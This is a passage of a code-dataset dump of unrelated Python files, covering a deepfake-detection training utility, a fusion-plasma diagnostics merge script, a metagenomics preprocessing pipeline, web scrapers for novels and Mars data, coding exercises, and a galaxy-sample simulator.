torch\nimport random\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\n\nfrom torch.utils.data import Dataset\nfrom .transform import augmentation, trans\n\n\nclass CenterLoss(nn.Module):\n def __init__(self):\n super(CenterLoss, self).__init__()\n self.l2_loss = nn.MSELoss(reduction='sum')\n\n def forward(self, outputs, targets):\n return self.l2_loss(outputs, targets) / outputs.size(0)\n\n\nclass Metric(object):\n pass\n\n\nclass AverageMeter(Metric):\n def __init__(self, name='loss'):\n self.name = name\n self.reset()\n\n def reset(self):\n self.scores = 0.\n self.total_num = 0.\n\n def __call__(self, batch_score, sample_num=1):\n self.scores += batch_score\n self.total_num += sample_num\n return self.scores / self.total_num\n\n\nclass TopKAccuracyMetric(Metric):\n def __init__(self, topk=(1,)):\n self.name = 'topk_accuracy'\n self.topk = topk\n self.maxk = max(topk)\n self.reset()\n\n def reset(self):\n self.corrects = np.zeros(len(self.topk))\n self.num_samples = 0.\n\n def __call__(self, output, target):\n self.num_samples += target.size(0)\n _, pred = output.topk(self.maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n for i, k in enumerate(self.topk):\n correct_k = correct[:k].view(-1).float().sum(0)\n self.corrects[i] += correct_k.item()\n\n return self.corrects * 100. / self.num_samples\n\n\nclass Callback(object):\n def __init__(self):\n pass\n\n def on_epoch_begin(self):\n pass\n\n def on_epoch_end(self, *args):\n pass\n\n\nclass ModelCheckpoint(Callback):\n def __init__(self, savepath, monitor='val_topk_accuracy', mode='max'):\n self.savepath = savepath\n self.monitor = monitor\n self.mode = mode\n self.reset()\n super(ModelCheckpoint, self).__init__()\n\n def reset(self):\n if self.mode == 'max':\n self.best_score = float('-inf')\n else:\n self.best_score = float('inf')\n\n def set_best_score(self, score):\n if isinstance(score, np.ndarray):\n self.best_score = score[0]\n else:\n self.best_score = score\n\n def on_epoch_begin(self):\n pass\n\n def on_epoch_end(self, logs, net, **kwargs):\n current_score = logs[self.monitor]\n if isinstance(current_score, np.ndarray):\n current_score = current_score[0]\n\n if (self.mode == 'max' and current_score > self.best_score) or \\\n (self.mode == 'min' and current_score < self.best_score):\n self.best_score = current_score\n\n if isinstance(net, torch.nn.DataParallel):\n state_dict = net.module.state_dict()\n else:\n state_dict = net.state_dict()\n for key in state_dict.keys():\n state_dict[key] = state_dict[key].cpu()\n\n if 'feature_center' in kwargs:\n feature_center = kwargs['feature_center']\n feature_center = feature_center.cpu()\n\n torch.save({\n 'logs': logs,\n 'state_dict': state_dict,\n 'feature_center': feature_center}, self.savepath)\n else:\n torch.save({\n 'logs': logs,\n 'state_dict': state_dict}, self.savepath)\n\n\ndef get_transform(resize, phase='train'):\n if phase == 'train':\n return transforms.Compose([\n transforms.Resize(\n size=(int(resize[0] / 0.875), int(resize[1] / 0.875))),\n transforms.RandomCrop(resize),\n transforms.RandomHorizontalFlip(0.5),\n transforms.ColorJitter(brightness=0.126, saturation=0.5),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n else:\n return transforms.Compose([\n transforms.Resize(\n size=(int(resize[0] / 0.875), int(resize[1] / 0.875))),\n transforms.CenterCrop(resize),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n\ndef batch_augment(images, attention_map, mode='crop', theta=0.5,\n padding_ratio=0.1):\n batches, _, imgH, imgW = images.size()\n if mode == 'crop':\n crop_images = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_c = random.uniform(*theta) * atten_map.max()\n else:\n theta_c = theta * atten_map.max()\n crop_mask = F.upsample_bilinear(atten_map,\n size=(imgH, imgW)) >= theta_c\n nonzero_indices = torch.nonzero(crop_mask[0, 0, ...])\n height_min = max(\n int(nonzero_indices[:, 0].min().item() - padding_ratio * imgH),\n 0)\n height_max = min(\n int(nonzero_indices[:, 0].max().item() + padding_ratio * imgH),\n imgH)\n width_min = max(\n int(nonzero_indices[:, 1].min().item() - padding_ratio * imgW),\n 0)\n width_max = min(\n int(nonzero_indices[:, 1].max().item() + padding_ratio * imgW),\n imgW)\n crop_images.append(\n F.upsample_bilinear(images[batch_index:batch_index + 1, :,\n height_min:height_max, width_min:width_max],\n size=(imgH, imgW)))\n crop_images = torch.cat(crop_images, dim=0)\n return crop_images\n elif mode == 'drop':\n drop_masks = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_d = random.uniform(*theta) * atten_map.max()\n else:\n theta_d = theta * atten_map.max()\n drop_masks.append(\n F.upsample_bilinear(atten_map, size=(imgH, imgW)) < theta_d)\n drop_masks = torch.cat(drop_masks, dim=0)\n drop_images = images * drop_masks.float()\n return drop_images\n\n\nclass DfdcDataset(Dataset):\n\n def __init__(self, datapath=\"\", phase='train', resize=(300, 300)):\n assert phase in ['train', 'val', 'test']\n if phase == 'val':\n phase = 'valid'\n self.phase = phase\n self.resize = resize\n self.num_classes = 2\n self.epoch = 0\n self.next_epoch()\n self.aug = augmentation\n self.trans = trans\n self.datapath = datapath\n\n def next_epoch(self):\n with open('../dfdc.json') as f:\n dfdc = json.load(f)\n if self.phase == 'train':\n trainset = dfdc['train']+dfdc['valid']\n tr = list(filter(lambda x: x[1] == 0, trainset))\n tf = random.sample(list(filter(lambda x: x[1] == 1, trainset)), len(tr))\n self.dataset = tr+tf\n if self.phase == 'valid':\n validset = dfdc['test']\n tr = list(filter(lambda x: x[1] == 0, validset))\n tf = random.sample(list(filter(lambda x: x[1] == 1, validset)), len(tr))\n self.dataset = tr+tf\n if self.phase == 'test':\n self.dataset = dfdc['test']\n self.epoch += 1\n\n def __getitem__(self, item):\n try:\n vid = self.dataset[item // 20]\n ind = str(item % 20 * 12 + self.epoch % 12)\n ind = '0'*(3-len(ind))+ind+'.png'\n image = cv2.imread(os.path.join(self.datapath, vid[0], ind))\n image = cv2.resize(cv2.cvtColor(image, cv2.COLOR_BGR2RGB),\n self.resize)\n if self.phase == 'train':\n image = self.aug(image=image)['image']\n return self.trans(image), vid[1]\n except:\n return self.__getitem__((item + 250) % (self.__len__()))\n\n def __len__(self):\n return len(self.dataset) * 20\n\n","sub_path":"utils/wsdan.py","file_name":"wsdan.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"208786024","text":"\"\"\" Script to merge a list of diagnostics and summary values into a data dictionary dd\nUsage\ndd=numpy.load('pyfusion/90091_MP2012_384_rms_1.npz')['dd'].tolist()\nrun -i pyfusion/examples/merge_in_basic_params.py\n optional arguments \n exception=None suppress no exceptions (for debugging)\n debug set to 1 or higher to activate breakpoints\n diags List of diagnostic names as defined in the info ditcionary (below is a shorthand)\n diags=\",b_0,i_p,di_pdt,w_p,dw_pdt,dw_pdt2,beta,NBI\".split(',')\n\nNote: as of 14 Feb 2013, missing shot count is always []\n\n===Earlier notes during development=== (obsolete now)\nshot 46365, time 1.967 s\n\nfsfile='54194.txt'\ntime run -i pyfusion/examples/plot_text_pyfusion.py\ntim=ds['t_mid']\nrun -i pyfusion/examples/get_basic_params.py times=tim shots=[54194]\nrun -i pyfusion/examples/merge_in_basic_params.py\n\nfsfile='/c/cygwin/home/bdb112/python/daves/pyfusion/MP512all.txt'\ntime run -i pyfusion/examples/plot_text_pyfusion.py\ntim=ds['t_mid']\nrun -i pyfusion/examples/get_basic_params.py times=tim shots=[54194]\nrun -i pyfusion/examples/merge_in_basic_params.py\ndd=load('fridd.npy').tolist()\nrun -i pyfusion/examples/test_lasso_fs.py\n#save('fridd',dd)\nfor k in dd.keys(): exec(\"{0}=array(dd['{0}'])[:]\".format(k))\nw=where(beta>1)[0]\ndebug=0\nsp(dd,'freq','beta','amp', size_scale=10000,hold=0, ind=w,col='t_mid',marker='s')\nY\nsp(dd,'t_mid','freq','amp', size_scale=10000,hold=0, ind=w,col='beta',marker='s')\nY\ncolorbar()\nind=w\nrun -i pyfusion/examples/test_lasso_fs.py\n=====\n\n\n\"\"\"\nimport pyfusion\npyfusion.DEBUG=0\n\nfrom pyfusion.data.DA_datamining import DA\n#DAJ = DA('DA131128_HJ_ALL_50_52.npz',load=1)\n#dd=DAJ.da\n\n\n\nimport os.path\nimport numpy as np\nfrom pyfusion.acquisition.HeliotronJ.get_basic_diagnostics import get_basic_diagnostics, get_flat_top\n\ndebug=0\nexception = IOError\nexception = (IOError, LookupError, ValueError)\n\n#dd={}\n#for name in ds.dtype.names: dd.update({name: ds[name]})\ndiags=\",b_0,i_p,di_pdt,w_p,dw_pdt,dw_pdt2,beta,NBI\".split(',')\ndiags=\"b_0,w_p,dw_pdt,dw_pdt2,beta,NBI\".split(',')\n# diag _extra are the ones more likely to fail\ndiag_basic=\"IBTA,IBTB,IBHV,IBAV,IBIV,b_0\".split(',')\ndiag_extra=\"n_e19b0,n_e19dL5,ech,NBI\".split(',')\ndiag_extra=\"DIA135,MICRO01,NBIS3I,NBIS4I\".split(',')\nminshot=0\nmaxshot=999999 # higher than even LHD\nshot_list = []\ndiags=diag_basic\ndiags_scalar=\"b_0,R_ax,Quad,Gamma\".split(',')\nmaxcpu=0.5\n\nimport pyfusion.utils\nexec(pyfusion.utils.process_cmd_line_args())\n# now to merge the two.\nif len(np.shape(diags)) == 0: diags = [diags]\n\nsz = len(dd['shot'])\nmissing_shots = []\ngood_shots =[]\n\nctr=0\n\nregulator = pyfusion.utils.Regulator(maxcpu)\n \nif len(shot_list)==0:\n shots = np.unique(dd['shot'])\n wgt = np.where((shots >= minshot) & (shots <= maxshot))\n shot_list = shots[wgt]\n\nfor shot in shot_list:\n regulator.wait()\n # ws is the set of indices corresponding to the shot\n ws = np.where(shot == dd['shot'])[0]\n if len(ws)==0: # this is an impossible condition!\n raise LookupError('Impossible! could not find the expected shot {0}'.\n format(shot))\n else: \n try:\n times = dd['t_mid'][ws]\n basic_data = get_basic_diagnostics(diags,shot=shot,times=times,debug=1)\n if 'w_p' in diags: # omit all this if not asked for w_p (to make sure we get Bo)\n (tstart,tend,inds) = get_flat_top(times=None, shot=shot) # None important\n flat_level = times*0\n w=np.where((times>tstart) & (times0: print(\"len = {0}\".format(len(w)))\n basic_data.update({'flat_level': flat_level})\n\n good_shots.append(shot)\n except exception as details:\t\t\n missing_shots.append(shot)\n basic_data={}\n pyfusion.logging.warning(\"shot {s} not processed for diags, {info} {args}\"\n .format(s=shot, info=details, args=details.args))\n\n if basic_data != {}:\n #bsign = np.sign(basic_data['b_0'][0]) # no need to correct so far\n # not used yet - maybe use for phases.\n for key in basic_data.keys():\n if debug>0: print(key)\n if key in dd:\n ctr += 1\n if np.mod(ctr,10) == 0: \n print('\\nMerging in key {0} {1}'.format(key, shot)),\n else:\n print(key),\n else: \n print('Creating new key {0}'.format(key)) \n dd.update({key: (np.zeros(sz)+np.nan).astype(pyfusion.prec_med)})\n\n #store it at the corresponding indices\n\n if key in ['not-yet']:#['w_p','i_p','dw_pdt','dw_pdt2','di_pdt']:\n # this probably doesn't need astype (as it is a scatter)\n dd[key][ws] = bsign*basic_data[key].astype(pyfusion.prec_med)\n \n else:\n dd[key][ws] = basic_data[key].astype(pyfusion.prec_med)\n if debug: print('{key}: avg={a:.3g}'.\n format(key=key,a=np.average(dd[key][ws]))),\n\ntry:\n filename\nexcept:\n filename='ddfile'\n print('filename defaulting to ', filename)\n\nsave_name = 'saved_'+os.path.splitext(os.path.split(filename)[1])[0]\nprint('Saving as {0}'.format(save_name))\n#np.save(save_name,dd)\n\nprint(\"{0} missing shots out of {1}\".format(len(missing_shots),(len(missing_shots)+len(good_shots))))\n\nif verbose>0: print('missing shots are {0}'.format(missing_shots))\n\nfor key in diags:\n print('{0:10s}: {1:.1f}%'.format(key, 100.0*np.sum(dd[key]*0==0)/sz))\n uv = np.unique(dd[key])\n if len(uv) < 10:\n print('key {key} has very few ({n}) different values: \\n{uv}'\n .format(key=key,n=len(uv),uv=uv))\n","sub_path":"pyfusion/examples/merge_basic_HJ_diagnostics.py","file_name":"merge_basic_HJ_diagnostics.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"56960188","text":"def plus_minus(arr):\n if not arr:\n return\n\n pos, neg, zero = 0, 0, 0\n l = len(arr)\n\n for num in arr:\n if not num:\n zero += 1\n elif num > 0:\n pos += 1\n else:\n neg += 1\n\n print(pos / l)\n print(neg / l)\n print(zero / l)\n","sub_path":"algorithms/warmup/PlusMinus.py","file_name":"PlusMinus.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"490521548","text":"#coding:utf-8\nfrom __future__ import print_function\nimport glob,os,re,argparse\nimport pandas as pd\n\n\ndef m1_fastqc(ALL_list,nnodes):\n \"\"\"\n :ALL_list: the string of all the paths of fastqc files '/'.\n :return: None\n \"\"\" \n if not os.path.isdir('fastqc_out'):\n print('Input folder is not exist; mkdir now.')\n os.system('mkdir fastqc_out')\n os.system('fastqc -t %s %s -o fastqc_out/' % (nnodes, ALL_list))\n else:\n print('fastqc step is skipped.')\n\ndef m2_run_kneaddata(nnodes, F_list, R_list, script_path):\n \"\"\"\n :nnodes: the number of nodes to parallel\n :F_list: the string of all the paths of forward fastqc files '/'.\n :R_list: the string of all the paths of paired reverse fastqc files '/'.\n :script_path: the path of custome script, default is /home/yxtan/HUMANN2_SOP_scripts/\n :return: None\n \"\"\"\n #2.1 Running KneadData\n #Use kneaddata to run pre-processing tools. First Trimmomatic is run to remove low quality sequences. Then Bowtie2 is run to screen out contaminant sequences. Below we are screening out reads that map to the human or PhiX genomes. Note KneadData is being run below on all unstitched FASTQ pairs with parallel, you can see our quick tutorial on this tool here. For a detailed breakdown of the options in the below command see this page. The forward and reverse reads will be specified by \"_1\" and \"_2\" in the output files, ignore the \"R1\" in each filename. Note that the \\ characters at the end of each line are just to split the command over multiple lines to make it easier to read.\n #the order of quotes are extremely important here.\n os.system('mkdir kneaddata_out')\n os.system(\"parallel -j %s --link 'kneaddata -i {1} -i {2} -o kneaddata_out/ \\\n -db /home/junyuchen/Databases/GRCh38_PhiX_bowtie2_index/GRCh38_PhiX --trimmomatic /home/junyuchen/Biosoft/anaconda3/envs/humann2/share/trimmomatic-0.39-1/ \\\n -t 4 --trimmomatic-options \\\"SLIDINGWINDOW:4:20 MINLEN:50\\\" \\\n --bowtie2-options \\\"--very-sensitive --dovetail\\\" --remove-intermediate-output' \\\n ::: %s ::: %s\" % (nnodes, F_list, R_list))\n #Clean up the output directory (helps downstream commands) by moving the discarded sequences to a subfolder:\n os.system('mkdir -p kneaddata_out/contam_seq')\n os.system('mv kneaddata_out/*_contam*.fastq kneaddata_out/contam_seq')\n #You can produce a logfile summarizing the kneadData output with this command:\n os.system('kneaddata_read_count_table --input kneaddata_out --output kneaddata_read_counts.txt')\n #2.2 Concatenate unstitched output \n #os.system('perl %s/concat_paired_end.pl -p %s --no_R_match -o cat_reads kneaddata_out/*_paired_*.fastq' % (script_path, nnodes)) \n\ndef m2_run_kneaddata_single(nnodes, F_list,script_path):\n \"\"\"\n :nnodes: the number of nodes to parallel\n :F_list: the string of all the paths of forward fastqc files '/'.\n :script_path: the path of custome script, default is /home/yxtan/HUMANN2_SOP_scripts/\n :return: None\n \"\"\"\n #2.1 Running KneadData\n #Use kneaddata to run pre-processing tools. First Trimmomatic is run to remove low quality sequences. Then Bowtie2 is run to screen out contaminant sequences. Below we are screening out reads that map to the human or PhiX genomes. Note KneadData is being run below on all unstitched FASTQ pairs with parallel, you can see our quick tutorial on this tool here. For a detailed breakdown of the options in the below command see this page. The forward and reverse reads will be specified by \"_1\" and \"_2\" in the output files, ignore the \"R1\" in each filename. Note that the \\ characters at the end of each line are just to split the command over multiple lines to make it easier to read.\n #the order of quotes are extremely important here.\n os.system('mkdir kneaddata_out')\n os.system(\"parallel -j %s 'kneaddata -i {1} -o kneaddata_out/ \\\n -db /home/junyuchen/Databases/GRCh38_PhiX_bowtie2_index/GRCh38_PhiX --trimmomatic /home/junyuchen/Biosoft/anaconda3/envs/humann2/share/trimmomatic-0.39-1/ \\\n -t 4 --trimmomatic-options \\\"SLIDINGWINDOW:4:20 MINLEN:50\\\" \\\n --bowtie2-options \\\"--very-sensitive --dovetail\\\" --remove-intermediate-output' \\\n ::: %s \" % (nnodes, F_list))\n #Clean up the output directory (helps downstream commands) by moving the discarded sequences to a subfolder:\n os.system('mkdir -p kneaddata_out/contam_seq')\n os.system('mv kneaddata_out/*_contam*.fastq kneaddata_out/contam_seq')\n #You can produce a logfile summarizing the kneadData output with this command:\n os.system('kneaddata_read_count_table --input kneaddata_out --output kneaddata_read_counts.txt')\n #2.2 Concatenate unstitched output \n #os.system('mkdir cat_reads/')\n #os.system('mv kneaddata_out/*kneaddata.fastq cat_reads/') \n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', dest='rd', type=str, required=True,\n help=\"the tabular-table contains paths of the raw data\")\n parser.add_argument('-n', '--node', dest='node', type=str, required=False, default='20',\n help=\"the number of nodes to request\")\n parser.add_argument('-sp', '--spath',dest='sp', type=str, required=False, default='/home/junyuchen/Lab/Meta-Analysis/Scripts/',\n help=\"path of the custom scripts\")\n parser.add_argument('-e', '--pair', dest='pair', type=str, required=False, default='True',\n help=\"Is it pair-end seq data? Default is 'True'; Any other strings will be considered False\")\n parser.add_argument('-j', '--jobs', dest='jobs', type=str, required=False, default='8',\n help=\"The number of jobs run parallell in humann2 step. Default is '8'; It is bounded by the total number of memory available. Each job should have 16GB memory\")\n args = parser.parse_args()\n print('Usage example with minimum parameters: python /home/yxtan/HUMANN2_SOP_scripts/Metagenomics_HUMANN2.py -i sample_table.txt -n 4')\n rd_dir = os.path.abspath(args.rd)\n script_path = os.path.abspath(args.sp)\n pair_end = args.pair\n nnodes = args.node\n njobs = args.jobs\n \n #需要检查输入的参数是否正确,主要是路径是否存在 \n if not os.path.isfile(rd_dir):\n print('Input sample table is not exist; Exit now.')\n exit(0)\n if not os.path.isdir(script_path):\n print('The folder of custom scripts is not exist; Exit now.')\n exit(0)\n\n #1. First Steps\n #1.1 Generate the list of samples\n #rd_dir = \"example_data_file.txt\"\n print(rd_dir)\n df = pd.read_csv(rd_dir, sep='\\t')\n F_list = df[\"forward-absolute-filepath\"].tolist() \n R_list = df[\"reverse-absolute-filepath\"].tolist() \n print(R_list[1])\n print(F_list[1])\n #print(Counter)\n #1.2 Inspect read quality\n #if pair_end == 'True':\n # m1_fastqc(ALL_list,nnodes)\n #else:\n # m1_fastqc(F_list,nnodes)\n \n #2. Read Quality-Control and Contaminant Screens and connect to a long read\n #if pair_end == 'True':\n m2_run_kneaddata(nnodes, F_list, R_list, script_path)\n #else:\n # m2_run_kneaddata_single(nnodes, F_list,script_path)\n \n #3. Determine Functions with HUMAnN2\n #m3_humann2(nnodes, script_path,njobs)\n\n\n\n\n\n\n","sub_path":"Scripts/humann2_old/Metagenomics_HUMANN2_pre.py","file_name":"Metagenomics_HUMANN2_pre.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"426315085","text":"from bs4 import BeautifulSoup\n\nimport re\n\nfrom src.imooc.spider_four_famous_novels_180524.html_downloader import HtmlDownloader\n\n\nclass UrlManager(object):\n\n # 获取各个小说的index's url\n def get_all_novel_urls(self, url):\n novel_urls = []\n\n html = HtmlDownloader().download(url)\n soup = BeautifulSoup(html, 'html.parser')\n novel_nodes = soup.find_all('a', href=re.compile(r\"(.*)/index.htm\"))\n for novel in novel_nodes:\n novel_urls.append('http://www.purepen.com/' + novel['href'])\n\n return novel_urls\n\n # 获取指定小说对应的各章节url\n def get_chapter_urls(self, url):\n chapter_urls = []\n\n text = HtmlDownloader().download(url)\n soup = BeautifulSoup(text, 'html.parser')\n\n title_node = soup.find('title').text\n chapter_nodes = soup.find_all('a', href=re.compile(r\"(\\d).htm\"))\n for chapter in chapter_nodes:\n chapter_urls.append(url.replace('index.htm', chapter['href']))\n\n return chapter_urls\n","sub_path":"py_pure/src/imooc/spider_four_famous_novels_180524/url_manager.py","file_name":"url_manager.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317045415","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nimport time\nimport pandas as pd\nimport pymongo\nimport requests\n\ndef init_browser():\n executable_path = {\"executable_path\": \"C:/Users/arodr/Documents/bootcamp/nu-chi-data-pt-04-2021-u-c/web-scraping-challenge/Mission to Mars/chromedriver.exe\"}\n return Browser(\"chrome\", **executable_path, headless=False)\n\ndef scrape_info():\n browser = init_browser()\n\n time.sleep(1)\n\n #mars news\n\n news_url = 'https://redplanetscience.com/'\n browser.visit(news_url)\n \n html = browser.html\n soup = bs(html, 'html.parser')\n\n news_title=soup.find(\"div\",class_='content_title').text\n\n news_p=soup.find(\"div\",class_='article_teaser_body').text\n\n #JPL Mars Space Images\n\n url = 'https://spaceimages-mars.com/image/mars/Icaria%20Fossae7.jpg'\n browser.visit(url)\n\n html = browser.html\n soup = bs(html, 'html.parser')\n\n stuff=soup.find('div',class_='carousel_container')\n\n image=stuff.a[\"data-fancybox-href\"]\n\n url=\"https://spaceimages-mars.com/\"\n\n featured_image_url = url + image\n\n #Mars Weather\n\n url = 'https://twitter.com/marswxreport?lang=en&lang=en&lang=en'\n browser.visit(url)\n\n html = browser.html\n soup = bs(html, 'html.parser')\n\n mars_weather=soup.find('p',class_='TweetTextSize TweetTextSize--normal js-tweet-text tweet-text').text\n\n #Mars Facts\n facts_url = 'https://galaxyfacts-mars.com/'\n browser.visit(facts_url)\n\n html=browser.html\n soup=bs(html, 'html.parser')\n \n tables = pd.read_html(facts_url)\n\n mars_df=tables[1]\n mars_df.columns=[\"description\",\"value\"]\n mars_df.set_index(\"description\",inplace=True)\n\n mars_html_table=mars_df.to_html()\n mars_html_table.replace('\\n','')\n \n\n #Mars Hemispheres\n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(url)\n\n html = browser.html\n soup = bs(html, 'html.parser')\n\n all_hemi1=soup.find(\"div\",class_='collapsible results')\n\n hemisphere1=all_hemi1.find_all('a')\n\n hemisphere_image_urls=[]\n\n for hemi in hemisphere1:\n if hemi.h3:\n title=hemi.h3.text\n link=hemi[\"href\"]\n main_url=\"https://astrogeology.usgs.gov/\"\n forward_url=main_url+link\n browser.visit(forward_url)\n html = browser.html\n soup = bs(html, 'html.parser')\n hemi2=soup.find(\"div\",class_= \"downloads\")\n image=hemi2.ul.a[\"href\"]\n hemi_dict={}\n hemi_dict[\"title\"]=title\n hemi_dict[\"img_url\"]=image\n hemisphere_image_urls.append(hemi_dict)\n browser.back()\n\n\n mars_py_dict={\n \"mars_news_title\": news_title,\n \"mars_news_paragraph\": news_p,\n \"featured_mars_image\": featured_image_url,\n \"mars_weather\": mars_weather,\n \"mars_facts\": mars_html_table,\n \"mars_hemisphers\": hemisphere_image_urls\n }\n browser.quit()\n\n return mars_py_dict ","sub_path":"Mission to Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"79035239","text":"def helper(candidates, index, results, chosen=\"\"):\n ## Base Case\n if index == len(candidates) - 1: \n results.append(chosen)\n return\n else: \n for i in range(index, len(candidates) - 1):\n helper(candidates, index + 1, results, chosen+candidates[index])\n\n print (results)\n \ndef letterCombinations(digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n lettersDictionary = {}\n lettersDictionary[\"2\"] = \"abc\"\n lettersDictionary[\"3\"] = \"def\"\n lettersDictionary[\"4\"] = \"ghi\"\n lettersDictionary[\"5\"] = \"jkl\"\n lettersDictionary[\"6\"] = \"mno\"\n lettersDictionary[\"7\"] = \"pqrs\"\n lettersDictionary[\"8\"] = \"tuv\"\n lettersDictionary[\"9\"] = \"wyxz\"\n \n results = []\n candidates = []\n for i in range(2, len(digits) + 2):\n letters = list(lettersDictionary[str(i)])\n for letter in letters:\n candidates.append(letter)\n \n \n helper(candidates, 0, results, \"\")\n\nif __name__ == \"__main__\":\n letterCombinations(\"23\")","sub_path":"Leetcode/recursion/lettersCombination.py","file_name":"lettersCombination.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"518010994","text":"\"\"\"\r\nSimulator: Sample Power-Law\r\n===========================\r\n\r\nThis script simulates a sample of `Imaging` datasets of galaxies where:\r\n\r\n - The galaxy's bulge is an `Sersic`.\r\n - The galaxy's disk is an `Sersic`.\r\n\r\nTo simulate the sample of galaxies, each galaxy is set up as a `Model` such that its parameters are drawn from\r\ndistributions defined via priors.\r\n\r\n__Sample Simulation__\r\n\r\nThe dataset fitted in this example script is simulated imaging data of a sample of 3 galaxies.\r\n\r\nThis data is not automatically provided with the autogalaxy workspace, and must be first simulated by running the\r\nscript `autogalaxy_workspace/scripts/simulators/imaging/samples/sersic_sersic.py`.\r\n\r\n__Uses__\r\n\r\nThis script is used in the graphical model tutorial `tutorial_6_science_case`, to demonstrate how the `sersic_index`\r\nparameters of bulge and disks in a sample of galaxies can be estimated hierarchically.\r\n\r\n__Light SNR Profiles__\r\n\r\nThis script uses the signal-to-noise based light profiles described in the\r\nscript `imaging/simulators/misc/manual_signal_to_noise_ratio.ipynb`, to make it straight forward to ensure every galaxy\r\nis visible in each image.\r\n\"\"\"\r\n# %matplotlib inline\r\n# from pyprojroot import here\r\n# workspace_path = str(here())\r\n# %cd $workspace_path\r\n# print(f\"Working Directory has been set to `{workspace_path}`\")\r\n\r\nfrom os import path\r\nimport autofit as af\r\nimport autogalaxy as ag\r\nimport autogalaxy.plot as aplt\r\n\r\n\"\"\"\r\n__Dataset Paths__\r\n\r\nThe `dataset_type` describes the type of data being simulated (in this case, `Imaging` data) and `dataset_sample_name`\r\ngives a descriptive name to the sample. \r\n\r\nThis data is not automatically provided with the autogalaxy workspace, and must be first simulated by running the \r\nscript `autogalaxy_workspace/scripts/simulators/imaging/samples/sersic_sersic.py`. \r\n\"\"\"\r\ndataset_label = \"samples\"\r\ndataset_type = \"imaging\"\r\ndataset_sample_name = \"sersic_sersic\"\r\n\r\n\"\"\"\r\nThe path where the dataset will be output, which in this case is:\r\n`/autogalaxy_workspace/dataset/imaging/sample/light_sersic_sersic_0`\r\n\"\"\"\r\ndataset_path = path.join(\"dataset\", dataset_type, dataset_label, dataset_sample_name)\r\n\r\n\"\"\"\r\n__Simulate__\r\n\r\nFor simulating an image of a galaxy, we use the Grid2DIterate object.\r\n\"\"\"\r\ngrid = ag.Grid2DIterate.uniform(\r\n shape_native=(150, 150),\r\n pixel_scales=0.1,\r\n fractional_accuracy=0.9999,\r\n sub_steps=[2, 4, 8, 16, 24],\r\n)\r\n\r\ngrid = ag.Grid2D.uniform(shape_native=(150, 150), pixel_scales=0.1)\r\n\r\n\"\"\"\r\nSimulate a simple Gaussian PSF for the image.\r\n\"\"\"\r\npsf = ag.Kernel2D.from_gaussian(\r\n shape_native=(11, 11), sigma=0.1, pixel_scales=grid.pixel_scales\r\n)\r\n\r\n\"\"\"\r\nTo simulate the `Imaging` dataset we first create a simulator, which defines the exposure time, background sky,\r\nnoise levels and psf of the dataset that is simulated.\r\n\"\"\"\r\nsimulator = ag.SimulatorImaging(\r\n exposure_time=300.0, psf=psf, background_sky_level=0.1, add_poisson_noise=True\r\n)\r\n\r\n\"\"\"\r\n__Sample Model Distributions__\r\n\r\nTo simulate a sample, we draw random instances of galaxies where the parameters of their light profiles are drawn from \r\ndistributions. These distributions are defined via priors -- the same objects that are used \r\nwhen defining the priors of each parameter for a non-linear search.\r\n\r\nBelow, we define the distributions the galaxy's bulge light is drawn from.\r\n\"\"\"\r\nbulge = af.Model(ag.lp_snr.Sersic)\r\n\r\nbulge.centre = (0.0, 0.0)\r\nbulge.ell_comps.ell_comps_0 = af.GaussianPrior(\r\n mean=0.0, sigma=0.2, lower_limit=-1.0, upper_limit=1.0\r\n)\r\nbulge.ell_comps.ell_comps_1 = af.GaussianPrior(\r\n mean=0.0, sigma=0.2, lower_limit=-1.0, upper_limit=1.0\r\n)\r\nbulge.signal_to_noise_ratio = af.UniformPrior(lower_limit=20.0, upper_limit=60.0)\r\nbulge.effective_radius = af.UniformPrior(lower_limit=1.0, upper_limit=5.0)\r\nbulge.sersic_index = af.GaussianPrior(\r\n mean=4.0, sigma=3.0, lower_limit=0.5, upper_limit=10.0\r\n)\r\n\r\ndisk = af.Model(ag.lp_snr.Sersic)\r\n\r\ndisk.centre = (0.0, 0.0)\r\ndisk.ell_comps.ell_comps_0 = af.GaussianPrior(\r\n mean=0.0, sigma=0.3, lower_limit=-1.0, upper_limit=1.0\r\n)\r\ndisk.ell_comps.ell_comps_1 = af.GaussianPrior(\r\n mean=0.0, sigma=0.3, lower_limit=-1.0, upper_limit=1.0\r\n)\r\ndisk.signal_to_noise_ratio = af.UniformPrior(lower_limit=20.0, upper_limit=60.0)\r\ndisk.effective_radius = af.GaussianPrior(\r\n mean=3.0, sigma=3.0, lower_limit=0.0, upper_limit=10.0\r\n)\r\n\r\ndisk.sersic_index = af.GaussianPrior(\r\n 